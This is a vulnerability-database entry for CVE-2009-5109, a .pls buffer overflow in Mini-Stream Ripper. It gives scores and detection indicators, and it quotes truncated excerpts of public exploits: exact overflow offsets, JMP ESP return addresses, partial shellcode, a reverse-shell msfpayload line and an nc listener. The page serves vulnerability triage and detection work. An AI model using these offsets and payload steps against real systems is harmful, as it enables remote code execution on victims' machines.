CVE-2009-5109
Published 2011-12-25
CVE-2009-5109: Stack-based buffer overflow in Mini-Stream Ripper 3.0.1.1 allows remote attackers to execute arbitrary code via a long entry in a .pls file.
Priority: P3 54 · Severity: critical · CVSS 2.0 base score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT (public exploit code available)
EPSS: 32.82% (98.1th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | ripper | — | — |
Detection & IOCs (extracted from sources)
Return-address byte sequences seen in exploit files:
- \x53\x93\x42\x7e (0x7e429353, JMP ESP in USER32.dll)
- \xed\x1e\x94\x7c (0x7c941eed, JMP ESP in SHELL32.dll)
Detection notes:
- Detect creation or loading of malicious .pls files with oversized entries (>17400 bytes) targeting Mini-Stream Ripper 3.0.1.1; the overflow offset is 17417 bytes before EIP overwrite.
- Monitor for JMP ESP gadget use at 0x7e429353 (USER32.dll) or 0x7c941eed (SHELL32.dll) as return addresses in stack-based overflow exploitation of Mini-Stream Ripper on Windows XP SP2/SP3.
- Detect HTTP responses serving .pls files with Content-Type 'application/pls+xml' from exploit frameworks, which may be used to deliver the malicious payload via the URL load feature of Mini-Stream Ripper.
- Flag .pls files containing a junk buffer of 17403+ repeated bytes (e.g., 0x44 or 0x41) followed by a 4-byte return address, indicative of exploit construction for CVE-2009-5109.
- The Metasploit module for this CVE uses a payload bad-character set that can help tune IDS/IPS signatures: null bytes and URL-special characters are excluded from shellcode.
- Detect use of the MSRcodec001.dll return address (0x0146b87b) as a universal JMP ESP gadget in .pls exploit files targeting Mini-Stream Ripper.
Notes:
- The JMP ESP return addresses differ between Windows XP SP2 (SHELL32.dll: 0x7c941eed) and SP3 (USER32.dll: 0x7e429353); detection rules targeting specific return addresses must account for both variants.
- The Metasploit module uses a StackAdjustment of -3500 and a payload space of 3500 bytes; the exploit offset (17417) differs slightly from the standalone PoC (17405), indicating minor variation between exploit implementations.
- The universal exploit variant uses a return address from MSRcodec001.dll (0x0146b87b) and a different junk buffer size (26074 bytes), making it distinct from the XP SP2/SP3-specific exploits.
No detection rules found.
Exploit-DB
Mini-stream Ripper 3.0.1.1 - Local Buffer Overflow (Metasploit) (3)
exploitdb · 2011-11-04
---
##
# $Id: mini_stream.rb 14155 2011-11-04 08:20:43Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
By creating a specially crafted pls file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'CORELAN Security Team ',
'Ron Henry ', # dijital1; Return address update
],
'Version' => '
Exploit-DB
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow
exploitdb · 2009-12-29
---
#Mini-Stream Ripper v3.0.1.1 Universal BOF !!!
#Discovered by ( mr_me) !!!
#Coded and Written by (Jacky)
#Greetz to Peter Van Eeckhoutte and all Corelanc0d3r team :D
#This time i exploited the program and i used as RET address a Universal one from MSRcodec00.dll
#And i haven't seen anyone using a universal address so i decided to do so ! ;-)
my $file="crash.pls";
print "Mini-Stream Ripper 3.0.1.1 Universal BOF vulnerability\n";
print "Greetz to Peter Van Eeckhoutte and Corelanc0d3r Team\n";
my $junk="A"x26074;
my $eip=pack('V',0x0146b87b); #>>>From MSRcodec001.dll (Universal address ;-) )
my $presc="SEXY"; # 4 Bytes to fill the pre-esp area !
my $esp="\x90"x25;
$esp=$esp."\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x4
Exploit-DB
Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow
exploitdb · 2009-12-27
---
#!/usr/bin/python
# ...:| Code Fix/Patch for WinXP - English |:...
# Referenced: http://www.exploit-db.com/exploits/10745 - mr_me
# and fixed the offset as well as tested the exploit against WinXP SP2 and SP3
# Exploit against Mini-Stream 3.0.1.1 WinXP English
# 12.27.2009
# Author: Ron Henry - [email protected] - dijital1
# Version: Mini-Stream 3.0.1.1
# Downloadable from: http://mini-stream.net/
# Tested against WinXP SP2 and SP3 - English
outputfile="astley.pls"
shellcode="\x44"*17403
#shellcode+="\xed\x1e\x94\x7c" # JMP ESP - SHELL32.dll Win XP SP2
shellcode+="\x53\x93\x42\x7e" # JMP ESP - USER32.dll Win XP SP3
shellcode+="CAFE"*8 # 32 Byte NOP Sled
# msfpayload windows/shell_reverse_tcp LHOST=172.16.77.218 LPORT=443
Exploit-DB
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow
exploitdb · 2009-12-27
---
/*
riptheministreamripper.c
Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit
exploited by: mr_me
Greetz to the Corelan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r
Visit: corelanc0d3r's blog http://www.corelan.be:8800/
reference: http://www.exploit-db.com/exploits/10646
Download: http://mini-stream.net/
Tested on: Windows XP sp3
Note: *** For educational purposes only ***
usage:
Compile and execute to create the .pls file and upload it to your favourite server.
Then click on 'LOAD' and then 'URL'. Enter the evil URL, BAM you win.
mrme@backtrack:~$ nc -v 192.168.2.5 4444
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed
Metasploit
Mini-Stream 3.0.1.1 Buffer Overflow
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1. By creating a specially crafted pls file, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References:
- http://www.exploit-db.com/exploits/10745
- http://www.exploit-db.com/exploits/10747
- http://www.exploit-db.com/exploits/10782
- http://www.exploit-db.com/exploits/18082
- http://www.osvdb.org/61341